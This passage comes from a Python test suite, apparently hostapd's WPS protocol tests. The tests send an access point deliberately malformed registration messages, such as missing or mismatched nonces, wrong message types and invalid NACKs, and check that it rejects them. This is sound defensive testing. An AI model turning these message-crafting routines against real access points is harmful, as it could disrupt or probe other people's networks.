msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m5_e_snonce1_mismatch(dev, apdev):
"""WPS proto: M5 E-SNonce1 mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, 16*'\x00')
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
def test_wps_ext_m7_missing_e_snonce2(dev, apdev):
"""WPS proto: M7 missing E-SNonce2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m7_e_snonce2_mismatch(dev, apdev):
"""WPS proto: M7 E-SNonce2 mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE2, 16*'\x00')
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m1_pubkey_oom(dev, apdev):
"""WPS proto: M1 PubKey OOM"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*'\x11'
e_nonce = 16*'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
with alloc_fail(hapd, 1, "wpabuf_alloc_copy;wps_process_pubkey"):
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
wps_wait_eap_failure(hapd, dev[0])
def wps_wait_eap_failure(hapd, dev):
ev = hapd.wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=5)
if ev is None:
raise Exception("EAP-Failure not reported")
dev.wait_disconnected()
@remote_compatible
def test_wps_ext_m3_m1(dev, apdev):
"""WPS proto: M3 replaced with M1"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M1) to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M1)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m5_m3(dev, apdev):
"""WPS proto: M5 replaced with M3"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5(M3) to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_m2(dev, apdev):
"""WPS proto: M3 replaced with M2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M2) to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M2)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m3_m5(dev, apdev):
"""WPS proto: M3 replaced with M5"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M5) to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_m7(dev, apdev):
"""WPS proto: M3 replaced with M7"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(M7) to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_done(dev, apdev):
"""WPS proto: M3 replaced with WSC_Done"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3(WSC_Done) to AP")
attrs = build_wsc_attr(ATTR_VERSION, '\x10')
attrs += build_attr_msg_type(WPS_WSC_DONE)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_Done)
send_wsc_msg(hapd, addr, m3)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_invalid(dev, apdev):
"""WPS proto: M2 followed by invalid NACK"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
attrs = b'\x10\x00\x00'
nack = build_eap_wsc(2, msg['eap_identifier'], attrs, opcode=WSC_NACK)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_no_msg_type(dev, apdev):
"""WPS proto: M2 followed by NACK without Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=None, eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_invalid_msg_type(dev, apdev):
"""WPS proto: M2 followed by NACK with invalid Msg Type"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
msg_type=WPS_WSC_ACK, eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_e_nonce_mismatch(dev, apdev):
"""WPS proto: M2 followed by NACK with e-nonce mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], 16*b'\x00', r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, nack)
wps_wait_eap_failure(hapd, dev[0])
@remote_compatible
def test_wps_ext_m2_nack_no_config_error(dev, apdev):
"""WPS proto: M2 followed by NACK without Config Error"""
pin = "12345670"
